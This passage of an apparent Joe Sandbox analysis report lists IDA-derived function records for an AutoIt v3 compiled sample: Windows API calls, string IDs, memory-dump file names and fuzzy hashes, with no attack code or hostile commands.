                                                                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                  • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                  • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                  • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                  • String ID: @$AutoIt v3 GUI
                                                                                  • API String ID: 867697134-3359773793
                                                                                  • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                  • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                  • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                  • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                  • API String ID: 1503153545-1459072770
                                                                                  • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                  • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicoll$__wcsnicmp
                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                  • API String ID: 790654849-32604322
                                                                                  • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                  • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                  • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                  • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                  • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window
                                                                                  • String ID: 0
                                                                                  • API String ID: 2353593579-4108050209
                                                                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                  APIs
                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                  • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                  • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                  • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                  • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                  • String ID:
                                                                                  • API String ID: 1744303182-0
                                                                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                  • __mtterm.LIBCMT ref: 00417C34
                                                                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                    • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                  • __init_pointers.LIBCMT ref: 00417CE6
                                                                                  • __calloc_crt.LIBCMT ref: 00417D54
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                  • API String ID: 4163708885-3819984048
                                                                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                  • API String ID: 0-1896584978
                                                                                  • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                  • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                  • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                  • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicoll$IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2485277191-404129466
                                                                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                  APIs
                                                                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                  • GetDesktopWindow.USER32 ref: 0045476F
                                                                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3869813825-0
                                                                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00464B28
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                  • _wcslen.LIBCMT ref: 00464C28
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                  • _wcslen.LIBCMT ref: 00464CBA
                                                                                  • _wcslen.LIBCMT ref: 00464CD0
                                                                                  • _wcslen.LIBCMT ref: 00464CEF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$Directory$CurrentSystem
                                                                                  • String ID: D
                                                                                  • API String ID: 1914653954-2746444292
                                                                                  • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                  • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                  APIs
                                                                                  • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                  • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                  • _wcscat.LIBCMT ref: 0045CE8B
                                                                                  • _wcscat.LIBCMT ref: 0045CE9E
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                  • _wcscpy.LIBCMT ref: 0045CF61
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1153243558-438819550
                                                                                  • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                  • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                  • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                  • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicoll
                                                                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
